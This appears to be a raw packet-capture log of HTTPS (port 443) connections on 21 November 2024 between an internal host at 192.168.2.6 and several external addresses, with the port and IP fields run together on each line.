                                                                                                                                                                        Nov 21, 2024 10:37:28.938622952 CET49744443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:28.938641071 CET4434974413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:28.946918964 CET49744443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:28.946927071 CET4434974413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.048418045 CET49739443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:29.048448086 CET44349739188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.114964008 CET4434974213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.115041018 CET4434974213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.115139961 CET49742443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.117254972 CET49742443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.117278099 CET4434974213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.117289066 CET49742443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.117295027 CET4434974213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.122695923 CET49745443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.122750044 CET4434974513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.122807026 CET49745443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.123773098 CET49745443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.123792887 CET4434974513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.134643078 CET4434974013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.134732008 CET4434974013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.134783030 CET49740443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.192502022 CET4434974113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.192688942 CET4434974113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.192887068 CET49741443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.281801939 CET4434974313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.281881094 CET4434974313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.282020092 CET49743443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.311892986 CET49740443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.311893940 CET49740443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.311928988 CET4434974013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.311939955 CET4434974013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.356420994 CET4434974413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.356528997 CET4434974413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.356604099 CET49744443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.358422041 CET49741443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.358453989 CET4434974113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.358477116 CET49741443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.358485937 CET4434974113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.395013094 CET49743443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.395034075 CET4434974313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.395049095 CET49743443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.395056009 CET4434974313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.439790964 CET49744443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.439814091 CET4434974413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.439843893 CET49744443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.439850092 CET4434974413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.452424049 CET49746443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.452447891 CET4434974613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.452528954 CET49746443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.453386068 CET49746443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.453397989 CET4434974613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.455523968 CET49747443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.455573082 CET4434974713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.455624104 CET49747443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.455708027 CET49748443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.455743074 CET4434974813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.455794096 CET49748443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.456000090 CET49747443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.456017971 CET4434974713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.456419945 CET49748443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.456433058 CET4434974813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.457521915 CET49749443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.457556009 CET4434974913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.457608938 CET49749443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.457889080 CET49749443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:29.457904100 CET4434974913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.509766102 CET49750443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:29.509819984 CET44349750188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:29.509923935 CET49750443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:29.510274887 CET49750443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:29.510292053 CET44349750188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:30.766985893 CET44349750188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:30.767198086 CET49750443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:30.768913031 CET49750443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:30.768923998 CET44349750188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:30.769208908 CET44349750188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:30.770406008 CET49750443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:30.770529985 CET49750443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:30.770555019 CET44349750188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:30.770607948 CET49750443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:30.770613909 CET44349750188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:30.907165051 CET4434974513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:30.907685995 CET49745443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:30.907702923 CET4434974513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:30.908193111 CET49745443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:30.908198118 CET4434974513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.178333044 CET4434974913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.178939104 CET49749443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.178977013 CET4434974913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.179435968 CET49749443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.179440975 CET4434974913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.233215094 CET4434974613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.233629942 CET49746443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.233659983 CET4434974613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.234086037 CET49746443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.234091997 CET4434974613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.237520933 CET4434974813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.237871885 CET49748443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.237903118 CET4434974813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.238260984 CET49748443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.238272905 CET4434974813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.305744886 CET4434974713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.306427002 CET49747443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.306448936 CET4434974713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.306818962 CET49747443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.306824923 CET4434974713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.356874943 CET4434974513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.356945038 CET4434974513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.357008934 CET49745443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.357239962 CET49745443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.357239962 CET49745443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.357271910 CET4434974513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.357285976 CET4434974513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.360670090 CET49751443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.360702038 CET4434975113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.360796928 CET49751443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.361067057 CET49751443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.361078978 CET4434975113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.431915045 CET49752443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:31.431952000 CET4434975240.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.432028055 CET49752443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:31.432589054 CET49752443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:31.432602882 CET4434975240.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.620745897 CET4434974913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.620827913 CET4434974913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.620915890 CET49749443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.621072054 CET49749443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.621092081 CET4434974913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.621104002 CET49749443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.621109009 CET4434974913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.623570919 CET49753443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.623610020 CET4434975313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.623670101 CET49753443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.623856068 CET49753443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.623873949 CET4434975313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.626604080 CET44349750188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.626697063 CET44349750188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.626754045 CET49750443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:31.626980066 CET49750443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:31.626995087 CET44349750188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.676991940 CET4434974613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.677071095 CET4434974613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.677135944 CET49746443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.677301884 CET49746443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.677330017 CET4434974613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.677346945 CET49746443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.677355051 CET4434974613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.679856062 CET49754443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.679889917 CET4434975413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.679971933 CET49754443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.680103064 CET49754443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.680114985 CET4434975413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.680699110 CET4434974813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.680759907 CET4434974813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.680805922 CET49748443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.680845022 CET49748443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.680865049 CET4434974813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.680879116 CET49748443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.680886030 CET4434974813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.682600021 CET49755443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.682635069 CET4434975513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.682688951 CET49755443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.682794094 CET49755443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.682810068 CET4434975513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.763184071 CET4434974713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.763365030 CET4434974713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.763421059 CET49747443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.912384033 CET49747443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.912384987 CET49747443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:31.912465096 CET4434974713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:31.912497044 CET4434974713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:32.454884052 CET49756443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:32.454951048 CET4434975613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:32.455015898 CET49756443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:32.455296993 CET49756443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:32.455319881 CET4434975613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:32.800604105 CET49757443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:32.800640106 CET44349757188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:32.800714970 CET49757443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:32.801251888 CET49757443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:32.801259995 CET44349757188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.077378035 CET4434975113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.077896118 CET49751443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.077924967 CET4434975113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.078412056 CET49751443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.078418970 CET4434975113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.302203894 CET4434975240.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.302362919 CET49752443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:33.304490089 CET49752443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:33.304508924 CET4434975240.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.305278063 CET4434975240.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.307193041 CET49752443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:33.307245016 CET49752443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:33.307260990 CET4434975240.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.307393074 CET49752443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:33.341682911 CET4434975313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.342257977 CET49753443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.342278957 CET4434975313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.342734098 CET49753443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.342741013 CET4434975313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.351336002 CET4434975240.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.402147055 CET4434975413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.402857065 CET49754443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.402874947 CET4434975413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.403306961 CET49754443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.403316975 CET4434975413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.462316036 CET4434975513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.463054895 CET49755443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.463076115 CET4434975513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.463357925 CET49755443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.463366032 CET4434975513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.511580944 CET4434975113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.511651993 CET4434975113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.511732101 CET49751443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.511941910 CET49751443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.511961937 CET4434975113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.511975050 CET49751443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.511980057 CET4434975113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.514475107 CET49758443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.514525890 CET4434975813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.514600992 CET49758443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.514751911 CET49758443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.514770985 CET4434975813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.718226910 CET4434975240.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.718646049 CET4434975240.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.718902111 CET49752443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:33.718940020 CET4434975240.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.718955994 CET49752443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:33.776653051 CET4434975313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.776726007 CET4434975313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.776911020 CET49753443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.776972055 CET49753443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.776972055 CET49753443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.776993990 CET4434975313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.777007103 CET4434975313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.779396057 CET49759443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.779479980 CET4434975913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.781423092 CET49759443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.781548023 CET49759443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.781573057 CET4434975913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.843862057 CET4434975413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.844018936 CET4434975413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.844110012 CET49754443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.844144106 CET49754443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.844156981 CET4434975413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.844166040 CET49754443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.844171047 CET4434975413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.848906994 CET49760443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.848953009 CET4434976013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.849018097 CET49760443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.849306107 CET49760443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.849323034 CET4434976013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.906927109 CET4434975513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.906984091 CET4434975513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.907129049 CET49755443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.907454014 CET49755443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.907454014 CET49755443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.907486916 CET4434975513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.907505035 CET4434975513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.910001993 CET49761443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.910043955 CET4434976113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:33.910115004 CET49761443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.910252094 CET49761443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:33.910269022 CET4434976113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:34.080528975 CET44349757188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:34.080660105 CET49757443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:34.081969023 CET49757443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:34.081979990 CET44349757188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:34.082355022 CET44349757188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:34.086580038 CET49757443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:34.086672068 CET49757443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:34.086678028 CET44349757188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:34.092221975 CET49762443192.168.2.652.149.20.212
                                                                                                                                                                        Nov 21, 2024 10:37:34.092250109 CET4434976252.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:34.092339993 CET49762443192.168.2.652.149.20.212
                                                                                                                                                                        Nov 21, 2024 10:37:34.093986988 CET49762443192.168.2.652.149.20.212
                                                                                                                                                                        Nov 21, 2024 10:37:34.093997955 CET4434976252.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:34.185108900 CET4434975613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:34.185810089 CET49756443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:34.185854912 CET4434975613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:34.186247110 CET49756443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:34.186255932 CET4434975613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:34.619355917 CET4434975613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:34.619421959 CET4434975613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:34.619468927 CET49756443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:34.619786978 CET49756443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:34.619807959 CET4434975613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:34.619822025 CET49756443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:34.619827986 CET4434975613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:34.624006033 CET49763443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:34.624049902 CET4434976313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:34.624115944 CET49763443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:34.624397039 CET49763443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:34.624413967 CET4434976313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:34.788220882 CET44349757188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:34.788513899 CET44349757188.114.97.3192.168.2.6
